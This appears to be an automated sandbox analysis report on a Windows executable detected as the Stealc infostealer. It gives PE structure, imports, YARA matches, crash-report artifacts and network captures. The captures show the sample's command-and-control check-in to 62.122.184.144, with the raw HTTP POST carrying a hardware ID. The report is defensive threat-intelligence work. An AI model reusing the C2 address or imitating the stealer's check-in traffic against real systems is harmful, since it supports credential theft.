                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.0.<./.P.i.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC92.tmp.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4579
                                  Entropy (8bit):4.4747764069700775
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsbJg77aI9HXiTpWpW8VY+Ym8M4JIv1LFTI+q8IwzNj2NHQd:uIjf1I75XiTY7V+JcZIGzMNHQd
                                  MD5:3B60AA1251CE292AB49E601516C00851
                                  SHA1:22ECAF771BB2A1B53BE1206E4DD17BE908A52729
                                  SHA-256:77026AE8479EEC907065FADEDF5E3C0452DF726C072E600E243C2BB1D223AED6
                                  SHA-512:17A202BB18E86132A6E77219EFA5F81C33FFEA7C6ED62FB5FE5646EAC96B6B3EFCEF4FAAF88DA6B02C485B9A9DAD78955C9CF21C090433B4CFFE9D6CD5F4167D
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534201" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                  C:\Windows\appcompat\Programs\Amcache.hve

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.421572613897447
                                  Encrypted:false
                                  SSDEEP:6144:CSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN70uhiTw:RvloTMW+EZMM6DFyJ03w
                                  MD5:64F7CCC8A4973F7D147B8C9046564538
                                  SHA1:179DA61EF53DF24F2D310013A60467A79BCCFABB
                                  SHA-256:3D90109C3ABF5EF37DAC5CF1770C10DBD55EE7C4F31AF4566DFB6B9ACEAB459B
                                  SHA-512:E54D5D16FEFEB3C84F30B838B77F946226E9EA70654FA397E4C00FBC8891F6008F8ADDD62320244CBD24D8E6C34F030A0F26CE5E31D10C64ADDDE0AB41EC3D09
                                  Malicious:false
                                  Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmR._.Z.................................................................................................................................................................................................................................................................................................................................................H.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.045084053766364
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:ttFpxuMwKz.exe
                                  File size:336'896 bytes
                                  MD5:56f2a1223362b66cca9bf86b7cacad0c
                                  SHA1:484699fe4ecde29da1c5c73892881cea2f98eb8a
                                  SHA256:b5a8df0c020433116e2ec77cb313fc9f6d17fa57a8256c41adf5eec6e693e145
                                  SHA512:1e91f0c43f3e301ab2941fcdc6351c9e8462a526b79985ea39f8a23f9446ad5b1efe7947075c9df56944df848370b5c4860ce3901cc3508149507ab7efd9df4c
                                  SSDEEP:3072:X4L2rpWD9Oms9tuw4tATZbKaUIqPG6IExEBAUpyDfF4ZjuGIGhudKjXrRy5NnCu3:X4L2r89NMBUn07cfKpu5qSgKJvNJ
                                  TLSH:F664BF1062F2DF35F7B745325A75A6E8193BBDF6AA30C06E1103F69F0CB66918A05B13
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@.....................................h......................................Rich............PE..L...T5dd...................

                                  File Icon

                                  Icon Hash:17694cb2b24d3917

                                  Static PE Info

                                  General

                                  Entrypoint:0x401667
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x64643554 [Wed May 17 02:00:52 2023 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:0
                                  File Version Major:5
                                  File Version Minor:0
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:0
                                  Import Hash:fbc3e75f2d9f9185d8f077824c0d6c28

                                  Entrypoint Preview

                                  Instruction
                                  call 00007F7F08839494h
                                  jmp 00007F7F0883689Eh
                                  mov edi, edi
                                  push ebp
                                  mov ebp, esp
                                  sub esp, 00000328h
                                  mov dword ptr [004353C8h], eax
                                  mov dword ptr [004353C4h], ecx
                                  mov dword ptr [004353C0h], edx
                                  mov dword ptr [004353BCh], ebx
                                  mov dword ptr [004353B8h], esi
                                  mov dword ptr [004353B4h], edi
                                  mov word ptr [004353E0h], ss
                                  mov word ptr [004353D4h], cs
                                  mov word ptr [004353B0h], ds
                                  mov word ptr [004353ACh], es
                                  mov word ptr [004353A8h], fs
                                  mov word ptr [004353A4h], gs
                                  pushfd
                                  pop dword ptr [004353D8h]
                                  mov eax, dword ptr [ebp+00h]
                                  mov dword ptr [004353CCh], eax
                                  mov eax, dword ptr [ebp+04h]
                                  mov dword ptr [004353D0h], eax
                                  lea eax, dword ptr [ebp+08h]
                                  mov dword ptr [004353DCh], eax
                                  mov eax, dword ptr [ebp-00000320h]
                                  mov dword ptr [00435318h], 00010001h
                                  mov eax, dword ptr [004353D0h]
                                  mov dword ptr [004352CCh], eax
                                  mov dword ptr [004352C0h], C0000409h
                                  mov dword ptr [004352C4h], 00000001h
                                  mov eax, dword ptr [00434008h]
                                  mov dword ptr [ebp-00000328h], eax
                                  mov eax, dword ptr [0043400Ch]
                                  mov dword ptr [ebp-00000324h], eax
                                  call dword ptr [000000CCh]

                                  Rich Headers

                                  Programming Language:
                                  • [C++] VS2008 build 21022
                                  • [ASM] VS2008 build 21022
                                  • [ C ] VS2008 build 21022
                                  • [IMP] VS2005 build 50727
                                  • [RES] VS2008 build 21022
                                  • [LNK] VS2008 build 21022

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x336c40x3c.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1120000x1d348.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x333f80x18.rdata
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x320000x184.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x308df0x30a00fcd1aa5d002e765dff17d096e9326bcbFalse0.9253594955012854data7.873070673293666IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0x320000x1fa00x2000cbb94a8c54dfb9bbd30a01ee0dd3d905False0.3682861328125data5.598363170922723IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0x340000xda67c0x1400c2377d077ee99e993251b8cb1054832aFalse0.1681640625data1.8222435798688998IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .tojo0x10f0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .tls0x1100000x51d0x60053e979547d8c2ea86560ac45de08ae25False0.013020833333333334data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .jedemeb0x1110000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x1120000x14e3480x1d400854d6fb0b10cdc605bd64f8ca03c0a2eFalse0.4640090811965812data5.093496247518819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_CURSOR0x12a5580x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                  RT_ICON0x112a300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5711620469083155
                                  RT_ICON0x1138d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.641245487364621
                                  RT_ICON0x1141800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6941244239631337
                                  RT_ICON0x1148480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7514450867052023
                                  RT_ICON0x114db00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5196058091286307
                                  RT_ICON0x1173580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.62406191369606
                                  RT_ICON0x1184000x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6311475409836066
                                  RT_ICON0x118d880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7659574468085106
                                  RT_ICON0x1192680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.40405117270788915
                                  RT_ICON0x11a1100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.49864620938628157
                                  RT_ICON0x11a9b80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.5253456221198156
                                  RT_ICON0x11b0800x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.555635838150289
                                  RT_ICON0x11b5e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.34854771784232363
                                  RT_ICON0x11db900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.37546904315197
                                  RT_ICON0x11ec380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.3975409836065574
                                  RT_ICON0x11f5c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.4148936170212766
                                  RT_ICON0x11faa00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39792110874200426
                                  RT_ICON0x1209480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5591155234657039
                                  RT_ICON0x1211f00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6169354838709677
                                  RT_ICON0x1218b80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6416184971098265
                                  RT_ICON0x121e200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.43550656660412757
                                  RT_ICON0x122ec80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.42991803278688523
                                  RT_ICON0x1238500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.47606382978723405
                                  RT_ICON0x123d200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.40405117270788915
                                  RT_ICON0x124bc80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.49864620938628157
                                  RT_ICON0x1254700x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.5253456221198156
                                  RT_ICON0x125b380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.555635838150289
                                  RT_ICON0x1260a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.34854771784232363
                                  RT_ICON0x1286480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.37546904315197
                                  RT_ICON0x1296f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.3975409836065574
                                  RT_ICON0x12a0780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.4148936170212766
                                  RT_STRING0x12a8600x476data0.44921190893169877
                                  RT_STRING0x12acd80x504data0.45794392523364486
                                  RT_STRING0x12b1e00x6b4data0.4324009324009324
                                  RT_STRING0x12b8980x760data0.4253177966101695
                                  RT_STRING0x12bff80x706data0.42880978865406005
                                  RT_STRING0x12c7000x8b8data0.4211469534050179
                                  RT_STRING0x12cfb80x6d2data0.4306987399770905
                                  RT_STRING0x12d6900x4a4data0.46380471380471383
                                  RT_STRING0x12db380x62edata0.4361567635903919
                                  RT_STRING0x12e1680x520data0.45198170731707316
                                  RT_STRING0x12e6880x722data0.4244249726177437
                                  RT_STRING0x12edb00x564data0.4391304347826087
                                  RT_STRING0x12f3180x2edata0.6304347826086957
                                  RT_GROUP_CURSOR0x12a6880x14data1.15
                                  RT_GROUP_ICON0x11fa280x76dataTurkishTurkey0.6694915254237288
                                  RT_GROUP_ICON0x12a4e00x76dataTurkishTurkey0.6694915254237288
                                  RT_GROUP_ICON0x1191f00x76dataTurkishTurkey0.6610169491525424
                                  RT_GROUP_ICON0x123cb80x68dataTurkishTurkey0.7211538461538461
                                  RT_VERSION0x12a6a00x1bcdata0.581081081081081

                                  Imports

                                  DLLImport
                                  KERNEL32.dllSearchPathW, WriteConsoleOutputCharacterA, GetCommState, ReadConsoleA, InterlockedDecrement, QueryDosDeviceA, InterlockedCompareExchange, GetComputerNameW, GetTimeFormatA, ConnectNamedPipe, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, LoadLibraryW, GetConsoleMode, CopyFileW, ReadConsoleOutputW, GetConsoleAliasExesLengthW, FormatMessageW, GetSystemTimeAdjustment, DeleteVolumeMountPointW, HeapDestroy, GetFileAttributesW, GetBinaryTypeA, ReleaseSemaphore, GetShortPathNameA, GetLastError, GetLongPathNameW, GetProcAddress, SetStdHandle, BuildCommDCBW, GetNumaHighestNodeNumber, ResetEvent, LoadLibraryA, LocalAlloc, SetCalendarInfoW, FindAtomA, GetModuleFileNameA, GetDefaultCommConfigA, FatalAppExitA, GlobalReAlloc, GetVolumeInformationW, HeapAlloc, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW
                                  USER32.dllSetFocus

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  TurkishTurkey

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-10-08T10:18:27.165792+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.54970462.122.184.14480TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 8, 2024 10:18:26.110294104 CEST4970480192.168.2.562.122.184.144
                                  Oct 8, 2024 10:18:26.115278006 CEST804970462.122.184.144192.168.2.5
                                  Oct 8, 2024 10:18:26.115353107 CEST4970480192.168.2.562.122.184.144
                                  Oct 8, 2024 10:18:26.115472078 CEST4970480192.168.2.562.122.184.144
                                  Oct 8, 2024 10:18:26.120208979 CEST804970462.122.184.144192.168.2.5
                                  Oct 8, 2024 10:18:26.820089102 CEST804970462.122.184.144192.168.2.5
                                  Oct 8, 2024 10:18:26.821371078 CEST4970480192.168.2.562.122.184.144
                                  Oct 8, 2024 10:18:26.832600117 CEST4970480192.168.2.562.122.184.144
                                  Oct 8, 2024 10:18:26.838464975 CEST804970462.122.184.144192.168.2.5
                                  Oct 8, 2024 10:18:27.162113905 CEST804970462.122.184.144192.168.2.5
                                  Oct 8, 2024 10:18:27.165791988 CEST4970480192.168.2.562.122.184.144
                                  Oct 8, 2024 10:18:32.168229103 CEST804970462.122.184.144192.168.2.5
                                  Oct 8, 2024 10:18:32.169821024 CEST4970480192.168.2.562.122.184.144
                                  Oct 8, 2024 10:18:45.173361063 CEST4970480192.168.2.562.122.184.144

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 8, 2024 10:18:35.310369968 CEST53534101.1.1.1192.168.2.5

                                  HTTP Request Dependency Graph

                                  • 62.122.184.144

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.54970462.122.184.144806480C:\Users\user\Desktop\ttFpxuMwKz.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 8, 2024 10:18:26.115472078 CEST89OUTGET / HTTP/1.1
                                  Host: 62.122.184.144
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Oct 8, 2024 10:18:26.820089102 CEST203INHTTP/1.1 200 OK
                                  Date: Tue, 08 Oct 2024 08:18:26 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Oct 8, 2024 10:18:26.832600117 CEST420OUTPOST /f88d87a7e087e100.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----JEBKEHJJDAAAAKECBGHD
                                  Host: 62.122.184.144
                                  Content-Length: 219
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 45 36 31 46 44 42 41 44 46 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 35 5f 70 61 6c 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 2d 2d 0d 0a
                                  Data Ascii: ------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="hwid"DE61FDBADFAD2322695909------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="build"default5_pal------JEBKEHJJDAAAAKECBGHD--
                                  Oct 8, 2024 10:18:27.162113905 CEST210INHTTP/1.1 200 OK
                                  Date: Tue, 08 Oct 2024 08:18:26 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:04:18:15
                                  Start date:08/10/2024
                                  Path:C:\Users\user\Desktop\ttFpxuMwKz.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\ttFpxuMwKz.exe"
                                  Imagebase:0x400000
                                  File size:336'896 bytes
                                  MD5 hash:56F2A1223362B66CCA9BF86B7CACAD0C
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2312364166.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2312343251.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2072891062.0000000000970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:04:18:19
                                  Start date:08/10/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 804
                                  Imagebase:0xb20000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:6
                                  Start time:04:18:21
                                  Start date:08/10/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 812
                                  Imagebase:0xb20000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:8
                                  Start time:04:18:22
                                  Start date:08/10/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 836
                                  Imagebase:0xb20000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:10
                                  Start time:04:18:23
                                  Start date:08/10/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 844
                                  Imagebase:0xb20000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:12
                                  Start time:04:18:24
                                  Start date:08/10/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1040
                                  Imagebase:0xb20000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:14
                                  Start time:04:18:24
                                  Start date:08/10/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1052
                                  Imagebase:0xb20000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:16
                                  Start time:04:18:26
                                  Start date:08/10/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1052
                                  Imagebase:0xb20000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:18
                                  Start time:04:18:28
                                  Start date:08/10/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1336
                                  Imagebase:0xb20000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:6.5%
                                    Dynamic/Decrypted Code Coverage:4.9%
                                    Signature Coverage:12.3%
                                    Total number of Nodes:1418
                                    Total number of Limit Nodes:28
